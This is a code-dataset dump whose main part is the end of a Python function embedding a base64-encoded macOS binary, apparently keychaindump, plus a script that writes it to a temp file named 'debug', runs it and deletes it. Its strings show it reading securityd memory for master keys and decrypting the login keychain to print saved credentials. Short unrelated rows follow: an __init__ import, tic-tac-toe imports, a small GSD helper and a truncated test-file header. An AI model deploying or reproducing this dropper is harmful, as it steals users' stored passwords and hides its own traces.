/f//SImFAP3//+g2AwAAMfa5AAIAAInKSI0N3AYAAEiLvQD9//9JicCwAOjZAgAAiYX8/P//6S8AAAAx9rgAAgAAicJIjQ3ZBgAASI298P3//0yLhUD9//9Ni0AIsADopQIAAImF+Pz//0iNNbYGAABIjb3w/f//6KoCAABIiYUw/f//SIG9MP3//wAAAAAPhSUAAABIjT2OBgAASI218P3//7AA6L8CAAC/AQAAAImF9Pz//+hbAgAAMcCJxroCAAAASIu9MP3//+hqAgAASIu9MP3//4mF8Pz//+heAgAASImFKP3//0iLvSj9///oXQIAAEiJhSD9//9Ii70w/f//6GgCAAC6AQAAAInWSIu9IP3//0iLlSj9//9Ii40w/f//6AUCAABIi70w/f//SImF6Pz//+jgAQAASI09/wUAAEiNtfD9//+JheT8//+wAOgTAgAAx4UY/f//AAAAAMeFHP3/
/wAAAACJheD8//+LhRz9//87BREIAAAPjbgAAAC4GAAAAInCSI29kP3//0hjjRz9//9IizXnBwAASIs0zuiW5///SI09vQUAAEiNtZD9//+wAOitAQAASI290P3//0hjjRz9//9IixW0BwAASIs0ykiLlSD9//9Ii40o/f//iYXc/P//6H/x//+JhRj9//89AAAAAA+EIAAAAEiNPYoFAABIjbWQ/f//sADoVQEAAImF2Pz//+kbAAAA6QAAAACLhRz9//8FAQAAAImFHP3//+k2////gb0Y/f//AAAAAA+FHgAAAEiNPVkFAACwAOgRAQAAvwEAAACJhdT8///orQAAALgYAAAAicJIjbXQ/f//SI29UP3//+i75v//SI09VwUAAEiNtVD9//+wAOjSAAAASI290P3//0iLtSD9//+JhdD8///oPfj//+hI+v//6HP7//9Ii70g/f//6G0AAABIixWwBQAASIsSSDtV+A+FCwAAADHASIHEMAMAAF3D6CUAAACQ/yWcBQAA/yWeBQAA/yWgBQAA/yWiBQAA/yWkBQAA/yWmBQAA/yWoBQAA/yWqBQAA/yWsBQAA/yWuBQAA/yWwBQAA/yWyBQAA/yW0BQAA/yW2BQAA/yW4BQAA/yW6BQAA/yW8BQAA/yW+BQAA/yXABQAA/yXCBQAA/yXEBQAA/yXGBQAA/yXIBQAA/yXKBQAA/yXMBQAA/yXOBQAA/yXQBQAA/yXSBQAA/yXUBQAATI0d1QQAAEFT/yXFBAAAkGgAAAAA6eb///9oHAAAAOnc////aC8AAADp0v///2hDAAAA6cj///9oVwAAAOm+////aG0AAADptP///2iCAAAA6ar///9omgAAAOmg////aKYAAADplv///2i0AAAA6Yz///9owQAAAOmC////aM4AAADpeP///2jbAAAA6W7///9o6AAAAOlk////aPYAAADpWv///2gEAQAA6VD///9oEwEAAOlG////aCMBAADpPP///2gyAQAA6TL///9oQQEAAOko////aFABAADpHv///2heAQAA6RT///9obQEAAOkK////aHwBAADpAP///2iLAQAA6fb+//9omgEAAOns/v//aKoBAADp4v7//2i5AQAA6dj+//9ozgEAAOnO/v//JTAyeABbLV0gVG9vIG1hbnkgY2FuZGlkYXRlIGtleXMgdG8gZml0IGluIG1lbW9yeQoAc2VjdXJpdHlkAFstXSBDb3VsZCBub3QgYWxsb2NhdGUgbWVtb3J5IGZvciBrZXkgc2VhcmNoCgBbLV0gUmVxdWVzdGVkICVsdSBieXRlcywgZ290ICVsdSBieXRlcwoAWy1dIEVycm9yICglaSkgcmVhZGluZyB0YXNrIG1lbW9yeSBAICVwCgB2bW1hcCAlaQByAE1BTExPQ19USU5ZICVseC0lbHgAWypdIFNlYXJjaGluZyBwcm9jZXNzICVpIGhlYXAgcmFuZ2UgMHglbHgtMHglbHgKAFstXSBUb28gbWFueSBjcmVkZW50aWFscyB0byBmaXQgaW4gbWVtb3J5CgD63gcRAFstXSBDb3VsZCBub3QgZmluZCBEYkJsb2IKAHNzZ3AASt2iLHnoIQUAa3ljaABbLV0gVGhlIHRhcmdldCBmaWxlIGlzIG5vdCBhIGtleWNoYWluIGZpbGUKAFBhc3N3b3JkcyBub3Qgc2F2ZWQAJXM6JXM6JXMKAFstXSBDb3VsZCBub3QgZmluZCB0aGUgc2VjdXJpdHlkIHByb2Nlc3MKAFstXSBObyByb290IHByaXZpbGVnZXMsIHBsZWFzZSBydW4gd2l0aCBzdWRvCgBbKl0gRm91bmQgJWkgbWFzdGVyIGtleSBjYW5kaWRhdGVzCgAlcy9MaWJyYXJ5L0tleWNoYWlucy9sb2dpbi5rZXljaGFpbgBIT01FACVzAHJiAFstXSBDb3VsZCBub3Qgb3BlbiAlcwoA
WypdIFRyeWluZyB0byBkZWNyeXB0IHdyYXBwaW5nIGtleSBpbiAlcwoAWypdIFRyeWluZyBtYXN0ZXIga2V5IGNhbmRpZGF0ZTogJXMKAFsrXSBGb3VuZCBtYXN0ZXIga2V5OiAlcwoAWy1dIE5vbmUgb2YgdGhlIG1hc3RlciBrZXkgY2FuZGlkYXRlcyBzZWVtZWQgdG8gd29yawoAWytdIEZvdW5kIHdyYXBwaW5nIGtleTogJXMKAAABAAAADgAAAAAAAAAAAAAAAQAAABwAAAAAAAAAHAAAAAAAAAAcAAAAAgAAANAQAAA0AAAANAAAAH4qAAAAAAAANAAAAAMAAAAMAAEAEAABAAAAAAAAAAABFAAAAAAAAAADelIAAXgQARAMBwiQAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8KwAAAQAAAEYrAAABAAAAUCsAAAEAAABaKwAAAQAAAGQrAAABAAAAbisAAAEAAAB4KwAAAQAAAIIrAAABAAAAjCsAAAEAAACWKwAAAQAAAKArAAABAAAAqisAAAEAAAC0KwAAAQAAAL4rAAABAAAAyCsAAAEAAADSKwAAAQAAANwrAAABAAAA5isAAAEAAADwKwAAAQAAAPorAAABAAAABCwAAAEAAAAOLAAAAQAAABgsAAABAAAAIiwAAAEAAAAsLAAAAQAAADYsAAABAAAAQCwAAAEAAABKLAAAAQAAAFQsAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABEiIGAdAAAAEkBfX19zdGFja19jaGtfZ3VhcmQAUXIQkEBfbWFjaF90YXNrX3NlbGZfAJBAZHlsZF9zdHViX2JpbmRlcgCA4P//////////AZAAAAAAAAByIBFAX0RFU19lZGUzX2Ni
Y19lbmNyeXB0AJAAcigRQF9ERVNfc2V0X2tleQCQAHIwEkBfX19tZW1jcHlfY2hrAJAAcjgSQF9fX21lbXNldF9jaGsAkAByQBJAX19fc25wcmludGZfY2hrAJAAckgSQF9fX3NwcmludGZfY2hrAJAAclASQF9fX3N0YWNrX2Noa19mYWlsAJAAclgSQF9leGl0AJAAcmASQF9mY2xvc2UAkAByaBJAX2ZnZXRzAJAAcnASQF9mb3BlbgCQAHJ4EkBfZnJlYWQAkABygAESQF9mcmVlAJAAcogBEkBfZnNlZWsAkABykAESQF9mdGVsbACQAHKYARJAX2dldGVudgCQAHKgARJAX2dldGV1aWQAkAByqAESQF9tYWxsb2MAkABysAESQF9tZW1jbXAAkAByuAESQF9wY2xvc2UAkABywAESQF9wb3BlbgCQAHLIARJAX3ByaW50ZgCQAHLQARJAX3Jld2luZACQAHLYARJAX3NzY2FuZgCQAHLgARJAX3N0cmNtcACQAHLoARJAX3N0cm5jbXAAkABy8AESQF9zeXNjdGwAkABy+AESQF90YXNrX2Zvcl9waWQAkABygAISQF92bV9yZWFkX292ZXJ3cml0ZQCQAAABXwAFAApfbWhfZXhlY3V0ZV9oZWFkZXIAogFoZXhfc3RyaW5nAKYBYQCrAWcA0AFzZWFyY2hfZm9yX2tleXNfaW5fAO4BZmluZF9vcl9jcmVhdGVfY3JlZGVudGlhbHMAlwJjaGVja18zZGVzX3BsYWludGV4dF9wYWRkaW5nAJwCZAChAnByaW50X2NyZWRlbnRpYWxzAKUDbWFpbgCqAwIAAAADANAhAAACZGRfbWFzdGVyX2NhbmRpZGF0ZQDLAXRvbTMyAJICAwDQIgAAAmV0X3NlY3VyaXR5ZF9waWQA6QFfAK8DAwDwJAAAAnRhc2tfbWVtb3J5AIgCcHJvY2VzcwCNAgMA0CcAAwCQKwADAPAtAAMAoC4AAwCAMQAAAmVjcnlwdF8AtAJ1bXBfANACAAIzZGVzAMsCY3JlZGVudGlhbHMAoAMDAMAyAAADd3JhcHBpbmdfa2V5APoCa2V5AP8CY3JlZGVudGlhbHNfZGF0YQCWAwMAgDYAAAJfYmxvYgCRA2NoYWluAJsDAwDAOQADAIA+AAMAgEUAAwCQSQADAMBLAAMA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bnQAX2dfbWFzdGVyX2NhbmRpZGF0ZXMAX2dfbWFzdGVyX2NhbmRpZGF0ZXNfY291bnQAX2dldF9zZWN1cml0eWRfcGlkAF9oZXhfc3RyaW5nAF9tYWluAF9wcmludF9jcmVkZW50aWFscwBfc2VhcmNoX2Zvcl9rZXlzX2luX3Byb2Nlc3MAX3NlYXJjaF9mb3Jfa2V5c19pbl90YXNrX21lbW9yeQBfREVTX2VkZTNfY2JjX2VuY3J5cHQAX0RFU19zZXRfa2V5AF9fX21lbWNweV9jaGsAX19fbWVtc2V0X2NoawBfX19zbnByaW50Zl9jaGsAX19fc3ByaW50Zl9jaGsAX19fc3RhY2tfY2hrX2ZhaWwAX19fc3RhY2tfY2hrX2d1YXJkAF9leGl0AF9mY2xvc2UAX2ZnZXRzAF9mb3BlbgBfZnJlYWQAX2ZyZWUAX2ZzZWVrAF9mdGVsbABfZ2V0ZW52AF9nZXRldWlkAF9tYWNoX3Rhc2tfc2VsZl8AX21hbGxvYwBfbWVtY21wAF9wY2xvc2UAX3BvcGVuAF9wcmludGYAX3Jld2luZABfc3NjYW5mAF9zdHJjbXAAX3N0cm5jbXAAX3N5c2N0bABfdGFza19mb3JfcGlkAF92bV9yZWFkX292ZXJ3cml0ZQBkeWxkX3N0dWJfYmluZGVyAAAAAA=="
f = open("%sdebug", 'wb')
f.write(base64.b64decode(keychaindump))
f.close()
os.popen('chmod a+x %sdebug')
if "%s" != "":
print os.popen('%sdebug "%s"').read()
else:
print os.popen('%sdebug').read()
os.popen('rm -f %sdebug')
""" % (tempDir, tempDir, keyChain, tempDir, keyChain, tempDir, tempDir)
return script
| 309.542553
| 25,897
| 0.91463
| 772
| 29,097
| 34.465026
| 0.700777
| 0.002706
| 0.001278
| 0.001203
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.052011
| 0.040554
| 29,097
| 93
| 25,898
| 312.870968
| 0.901064
| 0.033406
| 0
| 0.070175
| 0
| 0.017544
| 0.947445
| 0.923249
| 0
| 1
| 0
| 0
| 0
| 1
| 0.035088
| false
| 0
| 0.035088
| 0
| 0.105263
| 0.035088
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
6a91a625ea1858a6778b2a05eefecfc7bdff3157
| 27
|
py
|
Python
|
bin/specsim3d/__init__.py
|
LutzGross/fingal
|
4b6fcc02871e7ba1a98f37ffd18f1a16a5fe6a48
|
[
"Apache-2.0"
] | null | null | null |
bin/specsim3d/__init__.py
|
LutzGross/fingal
|
4b6fcc02871e7ba1a98f37ffd18f1a16a5fe6a48
|
[
"Apache-2.0"
] | null | null | null |
bin/specsim3d/__init__.py
|
LutzGross/fingal
|
4b6fcc02871e7ba1a98f37ffd18f1a16a5fe6a48
|
[
"Apache-2.0"
] | null | null | null |
from .spectralsim import *
| 13.5
| 26
| 0.777778
| 3
| 27
| 7
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.148148
| 27
| 1
| 27
| 27
| 0.913043
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
6ab71f773426e60db4bc36c29bea27d52ebfcf38
| 174
|
py
|
Python
|
numerical_tic_tac_toe/__init__.py
|
gbroques/numerical-tic-tac-toe
|
143f4ec7a8417a551b3ed64253c5f6d7ad49b3d8
|
[
"MIT"
] | 1
|
2022-03-29T01:44:27.000Z
|
2022-03-29T01:44:27.000Z
|
numerical_tic_tac_toe/__init__.py
|
gbroques/numerical-tic-tac-toe
|
143f4ec7a8417a551b3ed64253c5f6d7ad49b3d8
|
[
"MIT"
] | null | null | null |
numerical_tic_tac_toe/__init__.py
|
gbroques/numerical-tic-tac-toe
|
143f4ec7a8417a551b3ed64253c5f6d7ad49b3d8
|
[
"MIT"
] | null | null | null |
from .action import Action
from .numerical_tic_tac_toe import GameState
from .numerical_tic_tac_toe import NumericalTicTacToe
from .player import Max
from .player import Min
| 29
| 53
| 0.856322
| 26
| 174
| 5.5
| 0.461538
| 0.181818
| 0.223776
| 0.265734
| 0.391608
| 0.391608
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114943
| 174
| 5
| 54
| 34.8
| 0.928571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
6ad87290005890120de007fa53c2b59a95a9c2c2
| 79
|
py
|
Python
|
src/stactools/sentinel2/utils.py
|
constantinius/sentinel2
|
29f32dbffbb623b01cf4be2c27646cb79a877b23
|
[
"Apache-2.0"
] | 1
|
2022-03-28T19:13:50.000Z
|
2022-03-28T19:13:50.000Z
|
src/stactools/sentinel2/utils.py
|
constantinius/sentinel2
|
29f32dbffbb623b01cf4be2c27646cb79a877b23
|
[
"Apache-2.0"
] | 13
|
2021-06-24T13:35:06.000Z
|
2022-03-31T19:54:57.000Z
|
src/stactools/sentinel2/utils.py
|
constantinius/sentinel2
|
29f32dbffbb623b01cf4be2c27646cb79a877b23
|
[
"Apache-2.0"
] | 2
|
2021-09-08T07:57:19.000Z
|
2022-01-06T10:42:18.000Z
|
def extract_gsd(image_path: str) -> float:
return float(image_path[-7:-5])
| 26.333333
| 42
| 0.696203
| 13
| 79
| 4
| 0.769231
| 0.346154
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.029412
| 0.139241
| 79
| 2
| 43
| 39.5
| 0.735294
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
0a7cc39ac42bbc5849c8282d768ac469e1c429dd
| 161
|
py
|
Python
|
brushtech/brushtech/doctype/estimate_bom/test_estimate_bom.py
|
Momscode-Technologies/brushtech
|
0ad9e5b39f29ed0e75b71b0e40853bbda9e967c9
|
[
"MIT"
] | null | null | null |
brushtech/brushtech/doctype/estimate_bom/test_estimate_bom.py
|
Momscode-Technologies/brushtech
|
0ad9e5b39f29ed0e75b71b0e40853bbda9e967c9
|
[
"MIT"
] | null | null | null |
brushtech/brushtech/doctype/estimate_bom/test_estimate_bom.py
|
Momscode-Technologies/brushtech
|
0ad9e5b39f29ed0e75b71b0e40853bbda9e967c9
